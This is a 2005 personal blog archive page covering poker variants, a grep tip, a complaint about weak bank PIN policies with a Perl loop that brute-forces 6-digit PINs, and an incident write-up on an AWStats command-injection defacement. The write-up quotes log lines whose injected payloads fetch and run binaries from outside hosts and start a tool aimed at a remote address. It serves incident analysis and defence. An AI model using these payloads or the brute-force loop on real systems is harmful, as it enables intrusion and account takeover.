
Archive for February, 2005

Poker Games

28 Feb

Since this is a hot topic these days (seems everybody at work is in at least one game), what kind of poker games do you all play?

Here’s the current list of what I play at the Saturday night poker game I host with friends.

Night Baseball
7 cards dealt face down, then you roll ‘em one at a time with betting each round. 9s are wild; 3 showing – you buy the pot and it’s wild for everybody (otherwise fold); 4 showing – you get an extra card.

5-Card Draw
Dealt 5 cards, bet, then discard and draw up to 4 replacement cards, bet again, then show hands.

Anaconda
7 cards, bet once, pass the trash (3 cards) left, then bet again.

Texas Hold ‘Em
Most popular game these days. Deal 2 down, then bet. Muck one off the deck, deal 3 up (community cards), bet again, deal 1 more up, bet. Deal last card up, bet again and show. Make your hand from the best 5 cards.

7-card stud
Deal 2 down, 4 up (betting in between each card), 1 down. Make your hand from the best 5 cards.

5-Card Stud
Deal 1 down, 4 up (bet each card).

6-card stud
Deal 1 down, 4 up (bet in between each card), 1 down. Best 5 cards wins.

8-Card Stud
Deal 2 down, 4 up (bet in between each card), 2 down. Bet again. Best 5 cards wins.

Baseball
Can be played as 5- or 7-card stud (dealt the same way). 9s wild; 3 up you buy the pot and it’s wild for everybody (otherwise fold).

Jacks or Better
Everyone antes, if nobody has a pair of Jacks or better, you re-deal and ante again (helps build the pot).

Low hand wins
All the games can be played where the object is to have the lowest hand (i.e. a pair of twos). Wheel or bicycle is the best hand, “A2345”.

My favorite 3 games are Anaconda, Night Baseball, and Texas Hold ‘Em.


Posted in Personal

 

Using Grep with Regular Expressions: Examples

24 Feb

Many of you may be wondering how to use the regular expression syntax with the infamous ‘grep’ tool.

It took me a while to figure this out, so I’m posting it so I will always remember it’s on my blog!

First, use -E to get extended regular expressions. Second, because grep normally matches one line at a time, a pattern that has to span the newline between two tags needs -z, which makes grep treat NUL rather than newline as the line terminator, so a text file becomes one long “line”; -l prints just the names of the files that match, and -r recurses into directories.

For example, to find all files in which a “<Bar>” tag is nested inside a “<Foo>” tag, i.e. something like:

<Foo>
<Bar>

$ grep -rzlE '<Foo[^>]*>[^>]*<Bar>' .

The first [^>]* allows attributes on the Foo tag, and the second allows any text, newlines included, up to the next tag, so this only reports a <Bar> that is the first tag after <Foo> (it would also match a tag named <Foobar>, so tighten the prefix if that matters).
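As an added example (not part of the original post), the script below builds two small constructed files in a temporary directory and runs the same pattern with and without -z, so you can see that -z is what lets [^>]* cross the newline between the two tags. The file names and contents are made up for the demonstration.

```shell
#!/bin/sh
# Added example, not from the original post: two constructed files show what
# -z changes. In nested.xml the <Bar> sits on the line after <Foo ...>; in
# flat.xml the <Bar> comes before <Foo>, so it is not nested inside it.
set -u

make_samples() {
  dir=$(mktemp -d)
  printf '<Foo id="1">\n  <Bar>\n</Foo>\n' > "$dir/nested.xml"
  printf '<Bar/>\n<Foo>\n</Foo>\n'        > "$dir/flat.xml"
  echo "$dir"
}

# The post's command: -z turns each file into a single NUL-terminated record,
# so [^>]* can run across the newline between the two tags. Prints the base
# names of the matching files, one per line.
nested_files() {
  grep -rzlE '<Foo[^>]*>[^>]*<Bar>' "$1" | sed 's|.*/||' | sort
}

# Same pattern without -z: grep now tests one line at a time, no single line
# holds both tags, and nothing is reported.
nested_files_linewise() {
  grep -rlE '<Foo[^>]*>[^>]*<Bar>' "$1" | sed 's|.*/||' | sort
}

samples=$(make_samples)
echo "with -z:    $(nested_files "$samples" | tr '\n' ' ')"
echo "without -z: $(nested_files_linewise "$samples" | tr '\n' ' ')"
rm -rf "$samples"
```

Only nested.xml is reported, and only when -z is present; flat.xml never matches because the text between its <Foo> and the end of the file contains the closing > of </Foo> before any <Bar>.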


Posted in Personal

 

Major Financial Institutions and Passwords

16 Feb

I routinely change my passwords every few months on all the financial providers I do online business with. The goal is to pick a secure password that is 8 characters long, mixes upper- and lower-case letters with digits, and has at least 2 special characters.

An example of a good password would be: “Foo)B4r!”

Part of the problem showed up when I recently installed Quicken 2005 Premier. The software would only let me send a 6-digit PIN to one of my banks, whereas the bank itself allowed an alphanumeric (letters and digits) password. It took me a while to figure out why I couldn’t download the transactions into Quicken 2005 Premier (complain to Intuit).

The password forced on me by more than one of the companies I do business with is something as weak as a 6-digit PIN (no letters or special characters). That is only 1,000,000 possibilities, so anyone who knows the username could crack the account with a script, unless the bank locks the account after a few failed attempts. All you’d have to do is write an iteration loop (Perl; tryLogin() stands for one login attempt):

my $i = 0;
while ($i <= 999999) {
    tryLogin(sprintf("%06d", $i));   # try each zero-padded 6-digit PIN in turn
    $i++;
}

What I’m saying is that this is a very stupid rule – it leads to people using insecure passwords, like their phone number, or birthday.
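As an added example (not from the original post), here is the password rule stated above turned into a check, next to the arithmetic behind the complaint about 6-digit PINs. The passwords it tests are constructed values (the first is the post’s own example), and the 94-symbol alphabet is simply printable ASCII, which the rule draws from.

```shell
#!/bin/sh
# Added example, not from the original post: a check for the password rule the
# post states (8+ characters, upper- and lower-case letters, a digit, at least
# two special characters) and the keyspace arithmetic behind the 6-digit PIN
# complaint. All passwords below are constructed test values.
set -u
export LC_ALL=C   # keep [A-Z] and friends strictly ASCII

# True (exit 0) when $1 satisfies the rule, false (exit 1) otherwise.
meets_policy() {
  pw=$1
  [ "${#pw}" -ge 8 ] || return 1
  printf '%s' "$pw" | grep -q '[A-Z]' || return 1
  printf '%s' "$pw" | grep -q '[a-z]' || return 1
  printf '%s' "$pw" | grep -q '[0-9]' || return 1
  # "special" here means anything that is not an ASCII letter or digit
  specials=$(printf '%s' "$pw" | tr -d 'A-Za-z0-9' | wc -c | tr -d ' ')
  [ "$specials" -ge 2 ]
}

# Number of candidates for a secret of $2 characters drawn from an alphabet
# of $1 symbols; a plain integer loop so it runs in any POSIX sh.
keyspace() {
  alphabet=$1; length=$2; total=1; i=0
  while [ "$i" -lt "$length" ]; do
    total=$((total * alphabet))
    i=$((i + 1))
  done
  echo "$total"
}

for candidate in 'Foo)B4r!' '123456' 'Password1!'; do
  if meets_policy "$candidate"; then
    echo "$candidate: ok"
  else
    echo "$candidate: rejected"
  fi
done
echo "6-digit PIN:            $(keyspace 10 6) candidates"
echo "8 printable characters: $(keyspace 94 8) candidates"
```

The 6-digit PIN space is a million guesses, which is what makes the loop in the post practical; the 8-character space the rule produces is about six thousand billion times larger, which is the gap the post is complaining about.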

Frankly, I’m quite disturbed at the lax password policies I’m finding with most of the financial institutions I use. 4 out of 5 of my providers do NOT allow for a secure password.

PayPal is the only site I’ve come across that allows for a secure password as described above.

I encourage you to send a quick email (feel free to copy and paste this blog posting) to your financial services institution in an effort to lobby them so they will implement more secure passwords. Simply go to their home page, and click on their “Contact Us” link (almost all banks and brokerages have this on the home page). It wouldn’t take more than 2 minutes, and if everybody does it, we will see some changes!

Below is a list of all the financial institutions I could think of (if you know of any others, feel free to post their contact info in the comments section):

Bank of America:
1.800.792.0808
email

Patelco Credit Union:
support@patelco.org
415.442.6200 or 1.800.358.8228 (toll-free, nationwide)

Ameritrade:
(click on New Accounts)
U.S. Phone: 800-669-3900
International Phone:
City Code: 402
Number: 970-5805
Canadian Phone: 866-328-3522 or 416-363-9045

Merrill Lynch:
Site Feedback
US: General Inquiries 1-800-MERRILL (637-7455)

Wells Fargo:
Online Banking and Bill Pay:
1-800-956-4442
Email

Schwab Plan:
Contact Us page
1-800-724-7526

Schwab:
Email
1-866-855-9102

E*Trade:
Call 1-800-ETRADE-1 (1-800-387-2331)
From outside the U.S., call +1-916-636-2510
Email is only available to customers

Washington Mutual:
I would CC everybody on this page
Personal Banking Customer Service: 800.788.7000
Home Loan Customer Service: 866.926.8937

Tech Credit Union:
Email Form
408-451-9111 or 800-553-0880


Posted in Personal

 

Simiens Crew 2005 – How They Did It!

02 Feb

Updated: Awstats 6.4 fixes even more security holes. Please upgrade to 6.4

One of my sites got hacked on Feb. 1, 2005; they changed the index.html and put up “Simiens Crew 2005, Enquanto Houver Fome Morte Guerra Simiens Existira” (Portuguese: as long as there is hunger, death and war, Simiens will exist).

I’ve heard people suspect both a PHP vulnerability and Awstats, both of which I’m using.

I’m using PHP Version 4.3.10 and Advanced Web Statistics 6.1 (build 1.751) (awstats)

I just checked the awstats homepage:

“Warning, a security hole was recently found in AWStats versions from 5.0 to 6.2 when AWStats is used as a CGI: A remote user can execute arbitrary commands on your server using permissions of your web server user (in most cases user “nobody”). If you use AWStats with another version or with option AllowToUpdateStatsFromBrowser set to 0, you are safe. If not, it is highly recommended to update to the 6.3 version that fixes this security hole.”

http://awstats.sf.net

Here’s some more info, and how I traced it down to awstats…

Here’s an excerpt from my clsearch.org log file:

tt.txt is a binary, which they ran (no idea what it did):

system("cd%20/tmp;wget%20protus.com.br/tt.txt;chmod%20777%20tt.txt;./tt.txt);

and dc.zip is also a binary they downloaded and ran:

system("wget%20gotmoney.100free.com/dc.zip");

An email to my provider: You also have several hacked instances on your server in /tmp, most of which are binaries, two of which are Perl scripts. One of the Perl scripts attempts to connect to an IRC server, the same server on which the people who hacked my site have a channel, #simiens. I couldn’t uncompress dc.zip (which was downloaded according to my log files, but I suspect dc.pl is what it contained – who knows what else, as it was an executable binary).

Some other nefarious things in /tmp on Neureal’s server:

brk2
cgi
ct
ct.1
dc.pl
index.html (contains a meta-refresh to some Japanese online shopping site)
nbot.pl
r0nin

(The source for the two Perl scripts can be found here)

To find exploitable awstats configuration files (grep -l rather than xargs cat, so you can see which file each hit is in, and the glob quoted so the shell doesn’t expand it before find sees it):

find . -name 'awstats*.conf' -exec grep -l 'AllowToUpdateStatsFromBrowser=1' {} +

Replace all those instances so it’s set to 0 instead, otherwise your customers will be exposed until you upgrade awstats.

Traverse the ./logs directory looking for exploit attempts in the rotated log files (67.169.x.x is my own IP; we’ll weed those out with grep -v). Grepping for “pluginmode=” instead of just awstats.pl narrows the hits to the injection itself:

find . -name '*.gz' | xargs zcat | grep awstats.pl | grep -v 67.169.x.x | less

Here’s the attack as it happened in my log file:

200.158.37.192 - - [29/Jan/2005:13:57:05 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("/bin/ls"); HTTP/1.1" 200 3294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:57:11 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("uname%20-a"); HTTP/1.1" 200 3302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:57:33 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("cd%20/tmp;wget%20protus.com.br/tt.txt;chmod%20777%20tt.txt;./tt.txt"); HTTP/1.1" 200 3207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:58:07 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("cd%20/tmp;ls"); HTTP/1.1" 200 6902 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:58:13 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("wget"); HTTP/1.1" 200 3302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:58:32 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("cd%20/tmp;wget%20protus.com.br/tt.txt;chmod%20777%20tt.txt;./tt.txt); HTTP/1.1" 200 3273 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:58:40 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("cd%20/tmp;wget%20protus.com.br/tt.txtt); HTTP/1.1" 200 3273 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:58:43 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("cd%20/tmp;wget%20protus.com.br/tt.txt); HTTP/1.1" 200 3273 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:58:53 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("id"); HTTP/1.1" 200 3272 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:59:02 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("wget%20protus.com.br/tt.txt"); HTTP/1.1" 200 3215 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:59:10 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("chmod%20777%20tt.txt"); HTTP/1.1" 200 3215 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:59:15 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("./tt.txt"); HTTP/1.1" 200 3293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:59:47 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("wget%20gotmoney.100free.com/dc.zip"); HTTP/1.1" 200 3215 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:59:52 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("chmod%20777%20dc.zip"); HTTP/1.1" 200 3215 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:14:00:32 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("./dc.zip%20200.204.170.225%206262"); HTTP/1.1" 200 3327 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:14:01:10 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("./dc.zip%20200.204.170.225%206262"); HTTP/1.1" 200 3334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:14:01:46 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("./dc.zip%20200.204.170.225%205050"); HTTP/1.1" 200 3334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:14:02:52 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("./dc.zip%20www.asianashop.com%206262"); HTTP/1.1" 200 3334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
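As an added example (not from the original post), the script below does the triage described above as reusable functions: it pulls the injected commands out of an access log, drops the administrator’s own address the way the grep -v does, counts requests per attacker for the report to the provider, and lists the awstats config files that still have AllowToUpdateStatsFromBrowser=1. The log lines and config files it works on are constructed for the demonstration; the request format copies the excerpt above, but the addresses are documentation ranges (203.0.113.5 as the attacker, 192.0.2.10 standing in for the admin’s own IP), not the ones in the real log.

```shell
#!/bin/sh
# Added example, not from the original post: the triage the post does by hand
# (zcat | grep awstats.pl | grep -v <own ip>) as small functions, plus the
# AllowToUpdateStatsFromBrowser check with file names kept. The log and the
# config files are constructed; the request format copies the post's log
# excerpt but the addresses are documentation ranges, not the ones above.
set -u
export LC_ALL=C

# Constructed access log; 192.0.2.10 plays the administrator's own address.
write_sample_log() {
  cat > "$1" <<'EOF'
192.0.2.10 - - [29/Jan/2005:13:50:01 -0500] "GET /cgi-bin/awstats.pl?config=example.org HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.5 - - [29/Jan/2005:13:57:05 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("/bin/ls"); HTTP/1.1" 200 3294 "-" "Mozilla/4.0"
203.0.113.5 - - [29/Jan/2005:13:57:33 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("cd%20/tmp;wget%20example.net/tt.txt;chmod%20777%20tt.txt;./tt.txt"); HTTP/1.1" 200 3207 "-" "Mozilla/4.0"
192.0.2.10 - - [29/Jan/2005:14:10:00 -0500] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
EOF
}

# One line per injected command, "<client ip>|<command>", own address removed,
# %20 and %2F decoded so the shell command reads as the attacker typed it.
injected_commands() {
  log=$1; own_ip=$2
  grep -F 'awstats.pl?pluginmode=' "$log" \
    | grep -v "^$own_ip " \
    | sed -n 's/^\([^ ]*\) .*pluginmode=:system("\([^"]*\)").*/\1|\2/p' \
    | sed 's/%20/ /g; s/%2[Ff]/\//g'
}

# Request count per attacking address, for the report to the provider.
attacker_ips() {
  injected_commands "$1" "$2" | cut -d'|' -f1 | sort | uniq -c | sed 's/^ *//'
}

# Two constructed awstats configs, one still exposed and one already fixed.
make_configs() {
  dir=$(mktemp -d)
  printf 'LogFile="/var/log/httpd/access_log"\nAllowToUpdateStatsFromBrowser=1\n' > "$dir/awstats.example.org.conf"
  printf 'LogFile="/var/log/httpd/access_log"\nAllowToUpdateStatsFromBrowser=0\n' > "$dir/awstats.example.net.conf"
  echo "$dir"
}

# Config files that still let the browser trigger an update. grep -l keeps the
# file name (the post's "xargs cat | grep" throws it away) and the ^ anchor
# skips commented-out lines.
vulnerable_configs() {
  find "$1" -name 'awstats*.conf' -exec grep -l '^AllowToUpdateStatsFromBrowser=1' {} + \
    | sed 's|.*/||' | sort
}

log=$(mktemp)
write_sample_log "$log"
echo "injected commands:"; injected_commands "$log" 192.0.2.10
echo "attackers:";         attacker_ips "$log" 192.0.2.10
cfg=$(make_configs)
echo "still exposed:";     vulnerable_configs "$cfg"
rm -rf "$log" "$cfg"
```

On a real server, point injected_commands at the output of zcat over the rotated logs instead of the sample file; the decoded command column is what you want to hand to the provider, since it names the download hosts and the files dropped in /tmp.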

REMEMBER: Always check user input when you’re coding. Restrict it to only what you deem acceptable, i.e. if it’s a phone number, use a regexp that accepts only the exact shape you expect and rejects everything else, for example in Perl:

if ($phone =~ /^\d{3}-\d{3}-\d{4}\z/) { $phone_ok = 1; }   # \z rather than $, so a trailing newline can't slip past; /g is not needed here

Obviously, international phone numbers won’t work, but you get the idea. The same goes for ANYTHING you pass to the system() command, which is how they hacked this server; better still, give system() a list of arguments instead of one string, so no shell ever parses the input at all.
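As an added example (not from the original post), the two functions below put the phone-number allow-list next to the mistake that made awstats exploitable: splicing user input into a command string that a shell then parses. printf stands in for whatever command the CGI would really run, and both inputs are constructed.

```shell
#!/bin/sh
# Added example, not from the original post: the post's phone-number allow-list
# next to the pattern that let awstats be exploited, building a shell command
# string out of user input. printf stands in for whatever command the CGI
# would run; the inputs are constructed.
set -u

# How the exploited code behaves: the input is pasted into a command string
# and handed to a shell, so ";" ends the intended command and starts another.
unsafe_lookup() {
  sh -c "printf 'looking up %s\n' $1"
}

# Allow-list first, then pass the value as a separate argument so the shell
# never parses it. A case pattern matches the whole value, so an embedded
# newline cannot sneak past the way it can with a line-oriented grep.
safe_lookup() {
  case $1 in
    [0-9][0-9][0-9]-[0-9][0-9][0-9]-[0-9][0-9][0-9][0-9]) ;;
    *) return 1 ;;
  esac
  printf 'looking up %s\n' "$1"
}

for input in '555-123-4567' '555-123-4567;echo INJECTED'; do
  echo "input: $input"
  echo " unsafe -> $(unsafe_lookup "$input" | tr '\n' ' ')"
  echo " safe   -> $(safe_lookup "$input" || echo rejected)"
done
```

With the second input the unsafe version prints INJECTED as a second line, exactly as the attacker’s ";wget ..." ran after the awstats plugin name; the safe version refuses it before any command runs.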

This also stresses the point of keeping your software (hopefully it’s open source) up to date. Holes in open source software get discovered and patched overnight, sometimes within hours of discovery. Just try to get a corporate conglomerate to “fix” their bug and have it available to you in that amount of time (they’ll even throw in a new licensing fee in order for you to get the fix). :-)

If anyone knows how to disassemble an executable to find out what it does, you can find their code here (beware, I wouldn’t run it on my machine).


Posted in Personal